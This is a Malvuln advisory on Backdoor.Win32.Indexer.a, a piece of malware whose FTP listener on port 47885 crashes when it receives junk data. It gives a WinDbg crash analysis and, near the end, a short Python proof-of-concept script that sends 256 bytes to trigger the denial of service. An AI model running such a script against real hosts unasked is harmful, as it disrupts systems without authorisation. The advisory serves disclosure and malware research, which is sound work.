Discovery / credits: Malvuln - malvuln.com (c) 2021 Original source: https://malvuln.com/advisory/2b576e7551afe1c7575dc680396f1b5b_B.txt Contact: malvuln13@gmail.com Media: twitter.com/malvuln Threat: Backdoor.Win32.Indexer.a Vulnerability: Remote Denial Of Service Description: Indexer.a runs an FTP server that listens on TCP port 47885, sending an unexpected payload of junk chars causes an exception resulting in a crash an denial of service. Type: PE32 MD5: 2b576e7551afe1c7575dc680396f1b5b Vuln ID: MVID-2021-0092 Dropped files: Disclosure: 02/16/2021 Memory Dump: (1618.14b0): Unknown exception - code 0eedfade (first/second chance not available) eax=00000000 ebx=00000000 ecx=00000007 edx=00000000 esi=00000003 edi=00000003 eip=7710ed3c esp=0019f460 ebp=0019f5f0 iopl=0 nv up ei pl nz ac pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000216 ntdll!ZwWaitForMultipleObjects+0xc: 7710ed3c c21400 ret 14h 0:000> !analyze -v ******************************************************************************* * * * Exception Analysis * * * ******************************************************************************* FAULTING_IP: KERNELBASE!RaiseException+62 75eb08f2 8b4c2454 mov ecx,dword ptr [esp+54h] EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff) ExceptionAddress: 75eb08f2 (KERNELBASE!RaiseException+0x00000062) ExceptionCode: 0eedfade ExceptionFlags: 00000001 NumberParameters: 7 Parameter[0]: 004129ae Parameter[1]: 04105d4c Parameter[2]: 04105dc8 Parameter[3]: 00000000 Parameter[4]: 00000000 Parameter[5]: 0019fe9c Parameter[6]: 0019fddc DEFAULT_BUCKET_ID: DELPHI_EXCEPTION PROCESS_NAME: Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe ERROR_CODE: (NTSTATUS) 0xeedfade - EXCEPTION_CODE: (Win32) 0xeedfade (250477278) - EXCEPTION_PARAMETER1: 004129ae EXCEPTION_PARAMETER2: 04105d4c EXCEPTION_PARAMETER3: 04105dc8 EXCEPTION_PARAMETER4: 0 MOD_LIST: NTGLOBALFLAG: 0 APPLICATION_VERIFIER_FLAGS: 0 FAULTING_THREAD: 000014b0 PRIMARY_PROBLEM_CLASS: DELPHI_EXCEPTION BUGCHECK_STR: APPLICATION_FAULT_DELPHI_EXCEPTION LAST_CONTROL_TRANSFER: from 00443345 to 75eb08f2 STACK_TEXT: 0019fdf0 00443345 041050ac 041050ac 0044317f KERNELBASE!RaiseException+0x62 WARNING: Stack unwind information not available. Following frames may be wrong. 0019fe14 0040c70b 0040ba01 04102c70 00443345 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009 0019fe20 00443345 04102c70 04102c70 0044317f Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!FtpsrvTFtpServer$bdtr$qqrv+0x47 0019fe2c 0044317f 00000000 0019fe9c 00000000 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x30009 0019fe44 004311ea 04102200 00000001 0044c7a9 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x2fe43 0019fe50 0044c7a9 0041c253 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x1deae 0019fe54 0041c253 04102c70 04102c70 04102c70 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x3946d 0044c7a9 52ff108b 84c358e4 c3017fd2 108b5250 Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+0x8f17 0044c7ad 84c358e4 c3017fd2 108b5250 5ae852ff 0x52ff108b 0044c7b1 c3017fd2 108b5250 5ae852ff 8090c358 0x84c358e4 0044c7b5 108b5250 5ae852ff 8090c358 45a9b03d 0xc3017fd2 0044c7b9 5ae852ff 8090c358 45a9b03d 10760100 0x108b5250 0044c7bd 8090c358 45a9b03d 10760100 006a006a 0x5ae852ff 0044c7c1 45a9b03d 10760100 006a006a df68006a 0x8090c358 0044c7c5 10760100 006a006a df68006a e80eedfa 0x45a9b03d 0044c7c9 006a006a df68006a e80eedfa 0000bb7f 0x10760100 0044c7cd df68006a e80eedfa 0000bb7f 809090c3 0x6a006a 0044c7d1 e80eedfa 0000bb7f 809090c3 45a9b03d 0xdf68006a 0044c7d5 00000000 809090c3 45a9b03d 16740000 0xe80eedfa FOLLOWUP_IP: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b!Ftpsrvcinitialization$qqrv+30009 00443345 8b7310 mov esi,dword ptr [ebx+10h] SYMBOL_STACK_INDEX: 1 SYMBOL_NAME: backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009 FOLLOWUP_NAME: MachineOwner MODULE_NAME: Backdoor_Win32_Indexer_a_2b576e7551afe1c7575dc680396f1b5b IMAGE_NAME: Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe DEBUG_FLR_IMAGE_TIMESTAMP: 3814be7c STACK_COMMAND: dt ntdll!LdrpLastDllInitializer BaseDllName ; dt ntdll!LdrpFailureData ; ~0s; .ecxr ; kb BUCKET_ID: APPLICATION_FAULT_DELPHI_EXCEPTION_backdoor_win32_indexer_a!Ftpsrvcinitialization$qqrv+30009 FAILURE_BUCKET_ID: DELPHI_EXCEPTION_eedfade_Backdoor.Win32.Indexer.a.2b576e7551afe1c7575dc680396f1b5b.exe!Ftpsrvcinitialization$qqrv Exploit/PoC: from socket import * MALWARE_HOST="x.x.x.x" PORT=47885 def doit(): s=socket(AF_INET, SOCK_STREAM) s.connect((MALWARE_HOST, PORT)) PBARBAR="A"*256 s.send(PBARBAR) print("Backdoor.Win32.Indexer.a / Remote Dos") print("MD5: 2b576e7551afe1c7575dc680396f1b5b") print("By Malvuln"); if __name__=="__main__": doit() Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).